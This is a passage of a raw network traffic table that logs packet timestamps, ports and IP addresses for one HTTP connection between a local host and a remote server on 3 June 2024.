Jun 3, 2024 08:52:15.287579060 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287589073 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.287596941 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287614107 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.287631035 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288242102 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288252115 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288259983 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288288116 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288297892 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288410902 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288419962 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288429022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288450956 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288461924 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288598061 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288608074 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288638115 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288654089 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.288774967 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288785934 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.288820982 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.289587021 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289597034 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289606094 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289633036 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.289643049 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.289760113 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289807081 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.289943933 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289953947 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.289993048 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.292411089 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.292419910 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.292467117 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.403661013 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403680086 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403698921 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403709888 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403789997 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403801918 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403873920 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.403873920 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.403875113 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.403893948 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.403949976 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404011011 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404047966 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404056072 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404104948 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404118061 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404160023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404201031 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404213905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404242039 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404253006 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404438972 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404450893 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404486895 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404500008 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404541969 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404588938 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404599905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404630899 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404743910 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404756069 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404766083 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404783010 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404805899 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404911041 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404922009 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.404948950 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.404959917 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405138016 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405172110 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405184031 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405217886 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405227900 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405267954 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405318975 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405329943 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405364037 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405455112 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405464888 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405473948 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405498028 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405508041 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405673027 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405683994 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405693054 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405719995 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405730009 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.405841112 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.405880928 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406095982 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406126976 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406136036 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406167030 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406218052 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406230927 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406260014 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406267881 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406397104 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406408072 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406418085 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406443119 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406450033 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406600952 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406611919 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406620979 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406631947 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406641960 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406655073 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406666040 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.406801939 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.406841993 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.407054901 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.407094002 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.430035114 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.445112944 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.445132017 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.445167065 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.445173979 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.445236921 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.445276022 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520478964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520498037 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520509958 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520584106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520636082 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520680904 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520680904 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520710945 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520721912 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520731926 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520740986 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520751953 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520765066 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.520891905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.520932913 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521301985 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521348953 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521363020 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521373987 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521414995 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521485090 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521531105 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521549940 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521560907 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521599054 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521708012 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521718025 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521728992 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521742105 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521758080 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521769047 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521939993 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521950960 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521961927 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.521987915 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.521996021 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522063971 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522074938 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522087097 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522115946 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522124052 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522308111 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522319078 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522367001 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522735119 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522766113 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522778988 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522804022 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522829056 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522881031 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.522900105 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522911072 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.522948980 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523029089 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523081064 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523144007 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523154020 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523164034 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523176908 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523200035 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523209095 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523385048 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523396015 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523437977 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523508072 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523519993 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523560047 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523686886 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523698092 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523708105 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523720026 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523730993 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.523741007 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523751974 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.523765087 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524019003 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524029016 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524040937 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524051905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524065018 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524077892 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524099112 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524099112 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524302006 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524349928 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524370909 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524382114 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524419069 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524507999 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524519920 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524529934 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.524564028 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.524564028 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.525762081 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.525814056 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.525834084 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.525845051 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.525887012 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.525899887 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.525944948 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526262045 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526278019 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526305914 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526313066 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526362896 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526408911 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526426077 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526436090 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526468992 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526475906 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526588917 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526598930 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526633978 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526640892 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526694059 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526704073 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526719093 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526730061 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526745081 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526751995 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526856899 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526866913 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526906967 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.526952028 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.526998043 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527014971 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527060032 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527076960 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527086020 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527096987 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527116060 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527129889 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527257919 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527266979 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527276993 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527287960 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527302027 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527307987 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527307987 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527323961 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527333975 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527333975 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527359962 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527743101 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527796984 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527813911 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527823925 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527858973 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527865887 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527932882 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527941942 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527951956 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.527980089 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.527987003 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.528079987 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.528089046 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.528098106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.528107882 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.528125048 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.528131962 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.528145075 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.561779022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.561861038 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.561877966 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.561887026 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.561903000 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.561913967 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.562005997 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.562088013 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.562088013 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.562088013 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.636899948 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.636928082 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.636943102 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.636950016 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.636959076 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637082100 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637094975 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637109041 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637109041 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637124062 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637192965 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637202978 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637242079 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637367964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637377977 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637387037 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637394905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637404919 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637413025 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637422085 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637429953 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637448072 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637464046 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637670994 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637680054 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637690067 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637723923 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637736082 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637788057 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637831926 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637901068 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637911081 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637918949 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637928009 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637938023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637944937 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637959957 CEST	80	49163	45.33.6.223	192.168.2.22
